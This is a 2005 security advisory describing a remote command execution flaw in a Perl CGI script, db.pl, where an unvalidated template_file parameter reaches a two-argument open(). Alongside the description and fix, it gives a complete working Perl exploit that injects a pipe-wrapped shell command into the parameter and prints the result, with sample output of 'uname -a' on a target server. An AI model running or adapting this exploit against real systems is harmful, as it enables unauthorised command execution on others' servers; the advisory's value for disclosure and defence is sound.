BadRoot Security Advisory 2005-#0x02

-----------------------------------------
Author ........  Spher3
Date ..........  17-06-2005
Product .......  db.pl
Type ..........  Remote Command Execution
------------------------------------------

Description:
------------
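This script opens an HTML template file,
but the request parameter that selects the
template file is not validated before it is
passed to open(). Because the two-argument
form of Perl's open() treats a leading or
trailing "|" in the file name as a request
to run a command, a crafted template_file
value is executed instead of being read.
The fix is to accept only known template
names and to use the three-argument form of
open() with an explicit read mode.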

Vulnerable code:
----------------
[...] 
open(FILE, $TEMPLATE_DIR.$cgi_query->param("template_file")) 
[...]

Proof of Concept:
-----------------
#!/usr/bin/perl

#
# Authors .... Shawn` feat Spher3
# Vulnerability discovered by Spher3 @ 17-06-2005
# EX-Private Edition :)
#
# -----------------------------------------------------------------------
#
# bash-3.00$ perl db www.example.org /cgi-bin/ "uname -a"
# Target: www.example.org
# Path: /cgi-bin/
#
# FreeBSD example.org 4.10-RELEASE-p10 FreeBSD 4.10-RELEASE-p10 #0: 
# Wed Jun 30 19:03:56 CEST 2004 root@example.org:/usr/obj/usr/src/sys/S43
#
# -----------------------------------------------------------------------
#
# BadRoot Security Group
#

use LWP::Simple;
use strict;

# Print the command-line synopsis followed by one example invocation,
# then end the script with exit status 0.
sub usage
{
  # Both pieces interpolate $0, so the text shows the name the script
  # was actually started under.
  my @help_text = (
    "Usage:\nperl $0 [target] [path] [cmd]\n",
    "Examples:\nperl $0 www.example.com /cgi-bin/ \"uname -a\"\n\n",
  );
  print join('', @help_text);
  exit 0;
}

# Argument check: print the usage text and exit when the third argument
# is missing or false (an empty string or "0" also counts as false in
# Perl), or when the second argument contains no "/" at all.
usage if(! $ARGV[2] or !($ARGV[1]=~m/\//));

# Echo the host and path arguments exactly as they were given.
print "Target: $ARGV[0]\n",
      "Path: $ARGV[1]\n\n";

# Request suffix: the template_file parameter of db.pl carries the third
# argument wrapped in pipe characters. This is the value the advisory's
# "Vulnerable code" line concatenates onto $TEMPLATE_DIR and hands to a
# two-argument open().
# NOTE(review): for detection, a template_file value containing "|" in a
# request for db.pl is the pattern to look for in web-server logs; the
# pipe may be logged percent-encoded as %7C, so confirm against real logs.
# Remediation belongs in db.pl: accept only known template names and use
# three-argument open() with an explicit '<' mode.
my $VULN = "db.pl?template_file=|$ARGV[2]|";
# LWP::Simple::getprint fetches the URL over plain HTTP, prints the
# response body to STDOUT and returns the HTTP status code. $RES is not
# read again in the lines shown here.
my $RES = getprint("http://".$ARGV[0].$ARGV[1]. $VULN);

# e0f